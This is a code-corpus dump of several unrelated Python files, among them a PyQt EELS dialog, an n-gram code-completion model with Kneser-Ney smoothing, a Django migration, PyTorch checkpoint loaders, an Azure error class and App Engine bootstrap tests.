self.spec_dim = ft.get_dimensions_by_type(sidpy.DimensionType.SPECTRAL, dataset)
if len(self.spec_dim) != 1:
raise TypeError('We need exactly one SPECTRAL dimension')
self.spec_dim = self.spec_dim[0]
self.energy_scale = self.spec_dim[1].values.copy()
minimum_info = {'offset': self.energy_scale[0],
'dispersion': self.energy_scale[1] - self.energy_scale[0],
'exposure_time': 0.0,
'convergence_angle': 0.0, 'collection_angle': 0.0,
'acceleration_voltage': 100.0, 'binning': 1, 'conversion': 1.0,
'flux': 1.0, 'current': 1.0, 'SI_bin_x': 1, 'SI_bin_y': 1}
if 'experiment' not in self.dataset.metadata:
self.dataset.metadata['experiment'] = minimum_info
self.experiment = self.dataset.metadata['experiment']
for key, item in minimum_info.items():
if key not in self.experiment:
self.experiment[key] = item
def set_dimension(self):
self.spec_dim = ft.get_dimensions_by_type(sidpy.DimensionType.SPECTRAL, self.dataset)
self.spec_dim = self.spec_dim[0]
old_energy_scale = self.spec_dim[1]
self.dataset.set_dimension(self.spec_dim[0], sidpy.Dimension(np.array(self.energy_scale),
name=old_energy_scale.name,
dimension_type=sidpy.DimensionType.SPECTRAL,
units='eV',
quantity='energy loss'))
def update(self):
self.ui.offsetEdit.setText(f"{self.experiment['offset']:.3f}")
self.ui.dispersionEdit.setText(f"{self.experiment['dispersion']:.3f}")
self.ui.timeEdit.setText(f"{self.experiment['exposure_time']:.6f}")
self.ui.convEdit.setText(f"{self.experiment['convergence_angle']:.2f}")
self.ui.collEdit.setText(f"{self.experiment['collection_angle']:.2f}")
self.ui.E0Edit.setText(f"{self.experiment['acceleration_voltage']/1000.:.2f}")
self.ui.binningEdit.setText(f"{self.experiment['binning']}")
self.ui.conversionEdit.setText(f"{self.experiment['conversion']:.2f}")
self.ui.fluxEdit.setText(f"{self.experiment['flux']:.2f}")
self.ui.VOAEdit.setText(f"{self.experiment['current']:.2f}")
def on_enter(self):
sender = self.sender()
if sender == self.ui.offsetEdit:
value = float(str(sender.displayText()).strip())
self.experiment['offset'] = value
sender.setText(f"{value:.2f}")
self.energy_scale = self.energy_scale - self.energy_scale[0] + value
self.set_dimension()
self.plot()
elif sender == self.ui.dispersionEdit:
value = float(str(sender.displayText()).strip())
self.experiment['dispersion'] = value
self.energy_scale = np.arange(len(self.energy_scale)) * value + self.energy_scale[0]
self.set_dimension()
self.plot()
sender.setText(f"{value:.3f}")
elif sender == self.ui.timeEdit:
value = float(str(sender.displayText()).strip())
self.experiment['exposure_time'] = value
sender.setText(f"{value:.2f}")
elif sender == self.ui.convEdit:
value = float(str(sender.displayText()).strip())
self.experiment['convergence_angle'] = value
sender.setText(f"{value:.2f}")
elif sender == self.ui.collEdit:
value = float(str(sender.displayText()).strip())
self.experiment['collection_angle'] = value
sender.setText(f"{value:.2f}")
        elif sender == self.ui.E0Edit:
            value = float(str(sender.displayText()).strip())
            # the UI field is in kV; the acceleration voltage is stored in V
            self.experiment['acceleration_voltage'] = value * 1000.0
            sender.setText(f"{value:.2f}")
elif sender == self.ui.binXEdit or sender == self.ui.binYEdit:
if self.dataset.data_type == sidpy.DataType.SPECTRAL_IMAGE:
bin_x = int(self.ui.binXEdit.displayText())
bin_y = int(self.ui.binYEdit.displayText())
self.experiment['SI_bin_x'] = bin_x
self.experiment['SI_bin_y'] = bin_y
self.dataset.view.set_bin([bin_x, bin_y])
self.ui.binXEdit.setText(str(self.dataset.view.bin_x))
self.ui.binYEdit.setText(str(self.dataset.view.bin_y))
else:
print('not supported yet')
def plot(self):
if self.dataset.data_type == sidpy.DataType.SPECTRAL_IMAGE:
spectrum = self.dataset.view.get_spectrum()
self.axis = self.dataset.view.axes[1]
else:
spectrum = np.array(self.dataset)
self.axis = self.dataset.view.axis
x_limit = self.axis.get_xlim()
y_limit = self.axis.get_ylim()
self.axis.clear()
self.axis.plot(self.energy_scale, spectrum, label='spectrum')
self.axis.set_xlim(x_limit)
self.axis.set_ylim(y_limit)
self.figure.canvas.draw_idle()
def on_list_enter(self):
sender = self.sender()
if sender == self.ui.TEMList:
microscope.set_microscope(self.ui.TEMList.currentText())
self.experiment['microscope'] = microscope.name
self.experiment['convergence_angle'] = microscope.alpha
self.experiment['collection_angle'] = microscope.beta
self.experiment['acceleration_voltage'] = microscope.E0
self.update()
def set_energy_scale(self):
self.energy_dlg = ieels.EnergySelector(self.dataset)
self.energy_dlg.signal_selected[bool].connect(self.set_energy)
self.energy_dlg.show()
def set_energy(self, k):
self.spec_dim = ft.get_dimensions_by_type(sidpy.DimensionType.SPECTRAL, self.dataset)
self.spec_dim = self.spec_dim[0]
self.energy_scale = self.spec_dim[1]
self.experiment['offset'] = self.energy_scale[0]
self.experiment['dispersion'] = self.energy_scale[1] - self.energy_scale[0]
self.update()
def on_check(self):
pass
def set_action(self):
self.ui.offsetEdit.editingFinished.connect(self.on_enter)
self.ui.dispersionEdit.editingFinished.connect(self.on_enter)
self.ui.timeEdit.editingFinished.connect(self.on_enter)
self.ui.TEMList.activated[str].connect(self.on_list_enter)
self.ui.convEdit.editingFinished.connect(self.on_enter)
self.ui.collEdit.editingFinished.connect(self.on_enter)
self.ui.E0Edit.editingFinished.connect(self.on_enter)
self.ui.binningEdit.editingFinished.connect(self.on_enter)
self.ui.conversionEdit.editingFinished.connect(self.on_enter)
self.ui.fluxEdit.editingFinished.connect(self.on_enter)
self.ui.VOAEdit.editingFinished.connect(self.on_enter)
self.ui.energy_button.clicked.connect(self.set_energy_scale)
self.ui.binXEdit.editingFinished.connect(self.on_enter)
self.ui.binYEdit.editingFinished.connect(self.on_enter)
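# --- Illustrative launch sketch (not part of the original module) ---------------
# A hypothetical way to open the dialog standalone; with no dataset argument the
# constructor above falls back to ft.make_dummy_dataset(...).
#
#     import sys
#     from PyQt5 import QtWidgets
#
#     app = QtWidgets.QApplication(sys.argv)
#     dialog = InfoDialog()
#     sys.exit(app.exec_())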
|
py | b4112b1f0663fede4166fe0977b363f8c37472b9 | from collections import defaultdict
import nltk
from nltk.util import ngrams
from tqdm import tqdm
import numpy as np
import torch
from torchmetrics.functional.classification.f_beta import f1, fbeta
from torchmetrics.functional.classification.precision_recall import (precision,recall)
# for sorting the probable words according to their probabilities (most probable first)
# returns: void
# arg: dict
def sortProbWordDict(prob_dict):
for key in prob_dict:
if len(prob_dict[key]) > 1:
            # sort the candidate [probability, word] pairs in descending order of probability
prob_dict[key] = sorted(prob_dict[key], reverse=True)
# creates the dictionaries required for computing interpolated Kneser-Ney probability
# arg: dict, int
# returns: dict, dict
def createKNDict(ngram_dict, n):
    # For the Kneser-Ney probability formula we need to find two important counts:
    # for P(Wn|Wn-1) we need the number of ngrams that end with Wn and the number
    # of ngrams that start with Wn-1.
    # The formula is therefore split into two parts: the first term can be found in
    # constant time, while the second term is computed here.
    # first_dict stores the count of ngrams ending with Wn, key: unigram
    first_dict = {}
    # sec_dict stores the count of ngrams having Wn-1 as their starting part, key: (n-1)-gram sentence
sec_dict = {}
for key in ngram_dict:
# split the key sentence into tokens
ngram_token = key.split()
# since the indexing is from 0 ,so for quadgram we need to create a sentence of three words
# so start from 0 to 2,so we subtract 1,similarly for trigram from 0 to 1
n_1gram_sen = ' '.join(ngram_token[: n - 1])
# n_1gram_sen is the word that stars in sec_dict[n_1gram_sen] number of times in ngram_dict
if n_1gram_sen not in sec_dict:
sec_dict[n_1gram_sen] = 1
else:
sec_dict[n_1gram_sen] += 1
if ngram_token[-1] not in first_dict:
first_dict[ngram_token[-1]] = 1
else:
first_dict[ngram_token[-1]] += 1
return first_dict, sec_dict
# Computes the interpolated Kneser-Ney probability for prediction
# arg: dict, dict
# return: void
def computeKnesserNeyProb(n_gram_dict, prob_dict):
d = 0.75
# first create the dict for storing the count of Wn-1 followed by Wn and for
# ngrams preceding Wn-1
n_gram_fs_dict = {}
# n-gram starts from 2 so match the last ngram size it should be len(dic) + 1
last_gram_dict = n_gram_dict[len(n_gram_dict) + 1]
# building first and second KNdict
for n_gram in n_gram_dict:
# print(n_gram)
first_dict = {}
sec_dict = {}
first_dict, sec_dict = createKNDict(n_gram_dict[n_gram], n_gram)
n_gram_fs_dict[n_gram] = {1: first_dict, 2: sec_dict}
# now find the probability for the sentences
for n_gram in last_gram_dict:
n_gram_token = n_gram.split()
n_gram_sen = ' '.join(n_gram_token[:-1])
n_gram_pred = n_gram_token[-1]
prob = 0.0
for fs_n_gram in n_gram_fs_dict:
first_dict = {}
sec_dict = {}
first_dict = n_gram_fs_dict[fs_n_gram][1]
sec_dict = n_gram_fs_dict[fs_n_gram][2]
ngram_dict = n_gram_dict[fs_n_gram]
# check if the current ngram is equal to max ngrams given
# then calculate max gram probs else normal
if len(n_gram_fs_dict) + 1 == fs_n_gram:
ngram_dict_before = n_gram_dict[fs_n_gram - 1]
prob1 = max(ngram_dict[n_gram] - d, 0) / ngram_dict_before[n_gram_sen]
prob2 = d / ngram_dict_before[n_gram_sen] * (sec_dict[n_gram_sen])
else:
prob1 = max(first_dict[n_gram_pred] - d, 0) / len(ngram_dict)
prob2 = (d / len(ngram_dict)) * (sec_dict[' '.join(n_gram_token[1:fs_n_gram])])
if fs_n_gram == 2:
uni_prob = first_dict[n_gram_pred] / len(ngram_dict)
prob = prob1 + prob2 * (uni_prob)
else:
prob = prob1 + prob2 * (prob)
if n_gram_sen not in prob_dict:
prob_dict[n_gram_sen] = []
prob_dict[n_gram_sen].append([prob, n_gram_pred])
else:
prob_dict[n_gram_sen].append([prob, n_gram_pred])
def doPrediction(sen, prob_dict):
if sen in prob_dict:
return prob_dict[sen]
else:
return None
def calculate_accuracy(X_test, y_test, model, k):
k = max(k, 1)
score = 0
total = len(X_test)
for prevWords, trueWord in zip(X_test, y_test):
logits = doPrediction(prevWords, model)
if logits:
for count, value in enumerate(logits):
if count >= k: break
# prob = value[0]
pred = value[1]
if pred == trueWord:
score += 1
break
return score / total
def train_ngram(train_dataset, n_gram=5, smoothing=True):
# variable declaration
prob_dict = defaultdict(list) # for storing probability of probable words for prediction
if smoothing:
n_gram_dict = {} # for keeping count of sentences (n-grams)
for i in range(2, n_gram + 1):
print(f"\t> Building {i}-grams")
# creating ngram dict
temp_dict = defaultdict(int)
for item in tqdm(train_dataset):
tokens_stream = item['text']
for t in list(ngrams(tokens_stream, i)):
sen = ' '.join(t)
temp_dict[sen] += 1
n_gram_dict[i] = temp_dict
# Smoothing: compute the Knesser Ney probabilities
computeKnesserNeyProb(n_gram_dict, prob_dict)
else:
max_gram_dict = {}
count_dict = defaultdict(int)
for item in tqdm(train_dataset):
tokens_stream = item['text']
for t in list(ngrams(tokens_stream, n_gram)):
sen = ' '.join(t)
count_dict[sen] += 1
prev_words, target_word = t[:-1], t[-1]
if prev_words in max_gram_dict:
max_gram_dict[prev_words].append(target_word)
else:
max_gram_dict[prev_words] = [target_word]
for token, count_of_token in count_dict.items():
token = token.split()
prev_words, target_word = token[:-1], token[-1]
try:
count_of_context = float(len(max_gram_dict[tuple(prev_words)]))
prob = count_of_token / count_of_context
except KeyError:
prob = 0.0
prev_words = " ".join(prev_words)
if prev_words in prob_dict:
prob_dict[prev_words].append([prob, target_word])
else:
prob_dict[prev_words] = [[prob, target_word]]
# sort the probable words by their probability
sortProbWordDict(prob_dict)
return prob_dict
def calculate_PRF(X_test, y_test, model, word_idx):
preds = []
labels = []
for prevWords, trueWord in zip(X_test, y_test):
logits = doPrediction(prevWords, model)
if logits:
preds.append(word_idx[logits[0][1]])
else:
            preds.append(0)  # append the <pad> index (0) as the prediction, which is nearly impossible to match in the test set
labels.append(word_idx[trueWord])
preds = torch.as_tensor(preds)
labels = torch.as_tensor(labels)
scores = {}
scores['precision'] = precision(preds, labels, average='weighted', num_classes=502)
scores['recall'] = recall(preds, labels, average='weighted', num_classes=502)
scores['f1'] = f1(preds, labels, average='weighted', num_classes=502, beta=1)
scores['fbeta'] = fbeta(preds, labels, average='weighted', num_classes=502, beta=0.5)
return scores
def test_ngram(model, test_dataset, n_gram=5, word_idx=None):
X_test = []
y_test = []
for item in tqdm(test_dataset):
tokens_stream = item['text']
for i in range(n_gram, len(tokens_stream)):
seq = tokens_stream[i - n_gram: i]
X_test.append(" ".join(seq[0:-1]))
y_test.append(seq[-1])
scores = calculate_PRF(X_test, y_test, model, word_idx)
for i in [1, 2, 3, 4, 5, 10]:
scores[f'acc_{i}'] = calculate_accuracy(X_test, y_test, model, i)
return scores
def predict(seed, model, context_size):
logits = model[" ".join(seed[-(context_size - 1):])] # -(context_size-1) simple trick for sliding the context
if not logits:
return None, None
# prob = logits[0][0]
# pred = logits[0][1]
return logits[0][0], logits[0][1]
def greedy_decoder(seed, model, context_size, MaxPred):
answer = seed
# In n-gram model the pred word is included in context so we pad the seed with context - 2
PAD = ['<pad>'] * (context_size - 2)
seed = PAD + [seed]
while True:
prob_pred = doPrediction(" ".join(seed[-(context_size - 1):]), model)
if prob_pred is None:
return answer
prob, pred = prob_pred[0][0], prob_pred[0][1] # greedily taking top 1 predictions
answer += " " + pred
seed.append(pred)
if pred in [";", "{", "}"] or len(answer.split()) > MaxPred:
break
return answer
def beam_decoder(seed, model, context_size, MaxPred, k=5):
answer = seed
# In n-gram model the pred word is included in context so we pad the seed with context - 2
PAD = ['<pad>'] * (context_size - 2)
seed = PAD + [seed]
answers = []
prob_pred = doPrediction(" ".join(seed[-(context_size - 1):]), model)
if prob_pred is None:
return answer
# selecting top k predictions
for i in range(k):
try:
answers.append([(prob_pred[i][0], prob_pred[i][1])]) # prob, pred
except:
answers.append([(0.0, '<idf>')]) # prob, pred
count = 0
while True:
count += 1
for _ in range(k):
seq = answers.pop(0)
if seq[-1][1] in [";", "{", "}"]:
answers.append(seq)
continue
target_seed = seed + [s[1] for s in seq]
prob_pred = doPrediction(" ".join(target_seed[-(context_size - 1):]), model)
if prob_pred is None:
continue
# selecting top k predictions
for i in range(k):
try:
answers.append(seq + [(prob_pred[i][0], prob_pred[i][1])]) # prob, pred
except:
answers.append(seq + [(0.0, '<idf>')]) # prob, pred
dead_list = [sum([np.log(x[0]) for x in seq]) for seq in answers] # seq[:, 1]
try:
top_k_idx = np.argpartition(dead_list, -k)[-k:]
answers = [answers[i] for i in top_k_idx] # answers[top_k_idx]
except:
pass
if all([s[-1][1] in [";", "{", "}"] or len(s) > MaxPred for s in answers]):
break
dead_list = [sum([np.log(x[0]) for x in seq]) for seq in answers]
# TODO: Return k best
best_answer = answers[np.argmax(dead_list)]
for token in best_answer:
answer += " " + token[1]
return answer
def template_generator(model, test_dataset, context_size=5, method='greedy', topK=1):
X_true = []
X_pred = []
for item in tqdm(test_dataset):
tokens_stream = item['text']
test_item = " ".join(tokens_stream)
        seed = tokens_stream[0]
        if method == "greedy":
            # the decoders already return the seed followed by the predicted tokens
            pred_item = greedy_decoder(seed, model, context_size, context_size + 10)
        elif method == "beam":
            pred_item = beam_decoder(seed, model, context_size, context_size + 10, k=topK)
        else:
            raise ValueError("invalid method, please choose 'greedy' or 'beam'")
X_true.append(test_item)
X_pred.append(pred_item)
return X_true, X_pred
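# --- Illustrative usage sketch (not part of the original module) ----------------
# The functions above expect dataset items shaped like {'text': [token, ...]}.
# The toy corpus below is a made-up example used only to show the call pattern.
def _demo_ngram_usage():
    toy_train = [{'text': "int a = 0 ; int b = 1 ;".split()}] * 50
    model = train_ngram(toy_train, n_gram=5, smoothing=False)
    # Most probable continuation of the 4-token context "int a = 0".
    print(doPrediction("int a = 0", model))
    # Top-1 accuracy on (context, next-token) pairs drawn from the same toy data,
    # just to illustrate the expected X/y format.
    X_test = ["int a = 0", "; int b ="]
    y_test = [";", "1"]
    print(calculate_accuracy(X_test, y_test, model, k=1))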
|
py | b4112b3b96d2e976084e985c1bb773e6bd47bfb2 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mosaic.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_GroupBox(object):
def setupUi(self, GroupBox):
GroupBox.setObjectName("GroupBox")
GroupBox.resize(330, 183)
self.horizontalLayout = QtWidgets.QHBoxLayout(GroupBox)
self.horizontalLayout.setObjectName("horizontalLayout")
self.objectiveLabel = QtWidgets.QLabel(GroupBox)
self.objectiveLabel.setObjectName("objectiveLabel")
self.horizontalLayout.addWidget(self.objectiveLabel)
self.objectiveText = QtWidgets.QLabel(GroupBox)
self.objectiveText.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.objectiveText.setObjectName("objectiveText")
self.horizontalLayout.addWidget(self.objectiveText)
self.retranslateUi(GroupBox)
QtCore.QMetaObject.connectSlotsByName(GroupBox)
def retranslateUi(self, GroupBox):
_translate = QtCore.QCoreApplication.translate
GroupBox.setWindowTitle(_translate("GroupBox", "GroupBox"))
GroupBox.setTitle(_translate("GroupBox", "Mosaic"))
self.objectiveLabel.setText(_translate("GroupBox", "Objective:"))
self.objectiveText.setText(_translate("GroupBox", "asdf"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
GroupBox = QtWidgets.QGroupBox()
ui = Ui_GroupBox()
ui.setupUi(GroupBox)
GroupBox.show()
sys.exit(app.exec_())
|
py | b4112cddec670652db413dfe950eac02bcec0ad5 | # Scraper for California's Fourth District Court of Appeal Division 3
# CourtID: calctapp_4th_div3
# Court Short Name: Cal. Ct. App.
from juriscraper.opinions.united_states.state import calctapp_1st
class Site(calctapp_1st.Site):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.court_id = self.__module__
self.court_code = "G"
self.division = "4th App. Dist. Div. 3"
|
py | b4112d1e3bd66adcf89701f4e435a6babbb90ebd | # Generated by Django 2.1.5 on 2019-01-16 16:26
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('body', models.CharField(max_length=500)),
],
),
]
|
py | b4112dcb4127f9e5a1e5d3b31712df8f3ef89177 | import torch
import logging
logger = logging.getLogger('global')
def check_keys(model, pretrained_state_dict):
ckpt_keys = set(pretrained_state_dict.keys())
model_keys = set(model.state_dict().keys())
used_pretrained_keys = model_keys & ckpt_keys
unused_pretrained_keys = ckpt_keys - model_keys
missing_keys = model_keys - ckpt_keys
if len(missing_keys) > 0:
logger.info('[Warning] missing keys: {}'.format(missing_keys))
logger.info('missing keys:{}'.format(len(missing_keys)))
if len(unused_pretrained_keys) > 0:
logger.info('[Warning] unused_pretrained_keys: {}'.format(unused_pretrained_keys))
logger.info('unused checkpoint keys:{}'.format(len(unused_pretrained_keys)))
logger.info('used keys:{}'.format(len(used_pretrained_keys)))
assert len(used_pretrained_keys) > 0, 'load NONE from pretrained checkpoint'
return True
def remove_prefix(state_dict, prefix):
''' Old style model is stored with all names of parameters share common prefix 'module.' '''
logger.info('remove prefix \'{}\''.format(prefix))
f = lambda x: x.split(prefix, 1)[-1] if x.startswith(prefix) else x
return {f(key): value for key, value in state_dict.items()}
def load_pretrain(model, pretrained_path):
logger.info('load pretrained model from {}'.format(pretrained_path))
if not torch.cuda.is_available():
pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage)
else:
device = torch.cuda.current_device()
pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage.cuda(device))
if "state_dict" in pretrained_dict.keys():
pretrained_dict = remove_prefix(pretrained_dict['state_dict'], 'module.')
else:
pretrained_dict = remove_prefix(pretrained_dict, 'module.')
try:
check_keys(model, pretrained_dict)
except:
logger.info('[Warning]: using pretrain as features. Adding "features." as prefix')
new_dict = {}
for k, v in pretrained_dict.items():
k = 'features.' + k
new_dict[k] = v
pretrained_dict = new_dict
check_keys(model, pretrained_dict)
model.load_state_dict(pretrained_dict, strict=False)
return model
def restore_from(model, optimizer, ckpt_path):
logger.info('restore from {}'.format(ckpt_path))
device = torch.cuda.current_device()
ckpt = torch.load(ckpt_path, map_location=lambda storage, loc: storage.cuda(device))
epoch = ckpt['epoch']
best_acc = ckpt['best_acc']
arch = ckpt['arch']
ckpt_model_dict = remove_prefix(ckpt['state_dict'], 'module.')
check_keys(model, ckpt_model_dict)
model.load_state_dict(ckpt_model_dict, strict=False)
check_keys(optimizer, ckpt['optimizer'])
# ckpt['optimizer']['param_groups'] = [ckpt['optimizer']['param_groups'][0],
# ckpt['optimizer']['param_groups'][2],
# ckpt['optimizer']['param_groups'][3]]
optimizer.load_state_dict(ckpt['optimizer'])
return model, optimizer, epoch, best_acc, arch
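# --- Illustrative usage sketch (not part of the original helpers) ---------------
# Hypothetical round trip: save a checkpoint whose keys carry the DataParallel
# 'module.' prefix, then load it back through load_pretrain(). The tiny model and
# the file name are made up for the demo.
def _demo_load_pretrain(ckpt_path='demo_pretrain.pth'):
    import torch.nn as nn
    model = nn.Sequential(nn.Linear(4, 2))
    state = {'module.' + k: v for k, v in model.state_dict().items()}
    torch.save({'state_dict': state}, ckpt_path)
    # remove_prefix() strips 'module.' and check_keys() verifies the key overlap.
    return load_pretrain(model, ckpt_path)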
|
py | b4112ddba880d3dca99540318ce3f434f6ed6bcd | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
from msrest.exceptions import HttpOperationError
class ComputerVisionError(Model):
"""ComputerVisionError.
All required parameters must be populated in order to send to Azure.
:param code: Required. The error code. Possible values include:
'InvalidImageUrl', 'InvalidImageFormat', 'InvalidImageSize',
'NotSupportedVisualFeature', 'NotSupportedImage', 'InvalidDetails',
'NotSupportedLanguage', 'BadArgument', 'FailedToProcess', 'Timeout',
'InternalServerError', 'Unspecified', 'StorageException'
:type code: str or
~azure.cognitiveservices.vision.computervision.models.ComputerVisionErrorCodes
:param message: Required. A message explaining the error reported by the
service.
:type message: str
:param request_id: A unique request identifier.
:type request_id: str
"""
_validation = {
'code': {'required': True},
'message': {'required': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'ComputerVisionErrorCodes'},
'message': {'key': 'message', 'type': 'str'},
'request_id': {'key': 'requestId', 'type': 'str'},
}
def __init__(self, *, code, message: str, request_id: str=None, **kwargs) -> None:
super(ComputerVisionError, self).__init__(**kwargs)
self.code = code
self.message = message
self.request_id = request_id
class ComputerVisionErrorException(HttpOperationError):
"""Server responsed with exception of type: 'ComputerVisionError'.
:param deserialize: A deserializer
:param response: Server response to be deserialized.
"""
def __init__(self, deserialize, response, *args):
super(ComputerVisionErrorException, self).__init__(deserialize, response, 'ComputerVisionError', *args)
|
py | b4112e41d2e8093f709fda9fb461f9df035d9254 | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for backend.lib.bootstrap."""
import datetime
import os
import mock
from google.appengine.ext import deferred # pylint: disable=unused-import
from loaner.web_app.backend.clients import bigquery_client # pylint: disable=unused-import
from loaner.web_app.backend.lib import bootstrap
from loaner.web_app.backend.lib import datastore_yaml # pylint: disable=unused-import
from loaner.web_app.backend.models import bootstrap_status_model
from loaner.web_app.backend.models import config_model
from loaner.web_app.backend.testing import loanertest
class BootstrapTest(loanertest.TestCase):
"""Tests for the datastore YAML importer lib."""
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('google.appengine.ext.deferred.defer')
def test_run_bootstrap(self, mock_defer):
"""Tests that run_bootstrap defers tasks for all four methods."""
mock_defer.return_value = 'fake-task'
self.assertFalse(config_model.Config.get(
'bootstrap_started'))
bootstrap.run_bootstrap({
'bootstrap_bq_history': {},
'bootstrap_chrome_ous': {},
'bootstrap_datastore_yaml': {
'yaml_input': 'fake-yaml'
}
})
self.assertEqual(len(mock_defer.mock_calls), 3)
self.assertTrue(config_model.Config.get(
'bootstrap_started'))
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('google.appengine.ext.deferred.defer')
def test_run_bootstrap_all_functions(self, mock_defer):
"""Tests that run_bootstrap defers tasks for all four methods."""
mock_defer.return_value = 'fake-task'
self.assertFalse(config_model.Config.get(
'bootstrap_started'))
bootstrap.run_bootstrap()
self.assertEqual(len(mock_defer.mock_calls), 3)
self.assertTrue(config_model.Config.get(
'bootstrap_started'))
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', False)
def test_run_bootstrap_while_disabled(self):
"""Tests that bootstrapping is disallowed when constant False."""
self.assertRaises(
bootstrap.BootstrapError, bootstrap.run_bootstrap,
{'bootstrap_fake_method': {}})
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('__main__.bootstrap.datastore_yaml.import_yaml')
def test_manage_task_being_called(self, mock_importyaml):
"""Tests that the manage_task decorator is doing its task management."""
del mock_importyaml # Unused.
bootstrap.bootstrap_datastore_yaml(user_email='foo')
expected_model = bootstrap_status_model.BootstrapStatus.get_by_id(
'bootstrap_datastore_yaml')
self.assertTrue(bootstrap.bootstrap_datastore_yaml.__doc__.startswith(
expected_model.description))
self.assertTrue(expected_model.success)
self.assertTrue(expected_model.timestamp < datetime.datetime.utcnow())
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('__main__.bootstrap.datastore_yaml.import_yaml')
def test_manage_task_handles_exception(self, mock_importyaml):
"""Tests that the manage_task decorator kandles an exception."""
mock_importyaml.side_effect = KeyError('task-exception')
self.assertRaisesRegexp(
deferred.PermanentTaskFailure,
'bootstrap_datastore_yaml.*task-exception',
bootstrap.bootstrap_datastore_yaml, user_email='foo')
expected_model = bootstrap_status_model.BootstrapStatus.get_by_id(
'bootstrap_datastore_yaml')
self.assertFalse(expected_model.success)
self.assertTrue(expected_model.timestamp < datetime.datetime.utcnow())
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('__main__.bootstrap.datastore_yaml.import_yaml')
def test_bootstrap_datastore_yaml(self, mock_importyaml):
"""Tests bootstrap_datastore_yaml."""
bootstrap.bootstrap_datastore_yaml(user_email='foo')
yaml_file_to_string = open(os.path.join(
os.path.dirname(__file__), 'bootstrap.yaml')).read()
mock_importyaml.assert_called_once_with(
yaml_file_to_string, 'foo', True)
@mock.patch('__main__.bootstrap.logging.info')
@mock.patch('__main__.bootstrap.logging.warn')
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('__main__.bootstrap.directory.DirectoryApiClient')
def test_bootstrap_chrome_ous(
self, mock_directoryclass, mock_logwarn, mock_loginfo):
mock_client = mock_directoryclass.return_value
mock_client.get_org_unit.return_value = None
bootstrap.bootstrap_chrome_ous(user_email='foo')
self.assertEqual(3, mock_loginfo.call_count)
# Everything is fine.
mock_client.insert_org_unit.assert_has_calls([
mock.call(path) for _, path in
bootstrap.constants.ORG_UNIT_DICT.iteritems()
])
# get_org_unit reveals an existing OU of that name.
mock_client.reset_mock()
mock_client.get_org_unit.return_value = {'fake': 'response'}
bootstrap.bootstrap_chrome_ous(user_email='foo')
mock_client.insert_org_unit.assert_not_called()
mock_logwarn.assert_has_calls([
mock.call(bootstrap._ORG_UNIT_EXISTS_MSG, org_unit_name) for
org_unit_name in bootstrap.constants.ORG_UNIT_DICT
])
@mock.patch('__main__.bigquery_client.BigQueryClient')
def test_bootstrap_bq_history(self, mock_clientclass):
"""Tests bootstrap_bq_history."""
mock_client = mock.Mock()
mock_clientclass.return_value = mock_client
bootstrap.bootstrap_bq_history()
mock_client.initialize_tables.assert_called()
def test_is_bootstrap_completed(self):
"""Tests is_bootstrap_completed under myriad circumstances."""
self.assertFalse(bootstrap.is_bootstrap_completed())
bootstrap.config_model.Config.set('bootstrap_started', True)
self.assertFalse(bootstrap.is_bootstrap_completed())
bootstrap.config_model.Config.set('bootstrap_completed', False)
self.assertFalse(bootstrap.is_bootstrap_completed())
bootstrap.config_model.Config.set('bootstrap_completed', True)
self.assertTrue(bootstrap.is_bootstrap_completed())
def test_is_bootstrap_started(self):
self.assertFalse(bootstrap.is_bootstrap_started())
bootstrap.config_model.Config.set('bootstrap_started', True)
self.assertTrue(bootstrap.is_bootstrap_started())
@mock.patch('__main__.bootstrap.constants.BOOTSTRAP_ENABLED', True)
@mock.patch('__main__.bootstrap.get_all_bootstrap_functions')
def test_get_bootstrap_task_status(self, mock_getall):
"""Tests get_bootstrap_task_status."""
yesterday = datetime.datetime.utcnow() - datetime.timedelta(days=-1)
def fake_function1():
pass
def fake_function2():
pass
mock_getall.return_value = {
'fake_function1': fake_function1,
'fake_function2': fake_function2
}
fake_entity1 = bootstrap_status_model.BootstrapStatus.get_or_insert(
'fake_function1')
fake_entity1.success = True
fake_entity1.timestamp = yesterday
fake_entity1.details = ''
fake_entity1.put()
fake_entity2 = bootstrap_status_model.BootstrapStatus.get_or_insert(
'fake_function2')
fake_entity2.success = False
fake_entity2.timestamp = yesterday
fake_entity2.details = 'Exception raise we failed oh no.'
fake_entity2.put()
status = bootstrap.get_bootstrap_task_status()
self.assertEqual(len(status), 2)
if __name__ == '__main__':
loanertest.main()
|
py | b4112e6d0a0c5067c6ac9467b040f72b5c7a6fc4 | """
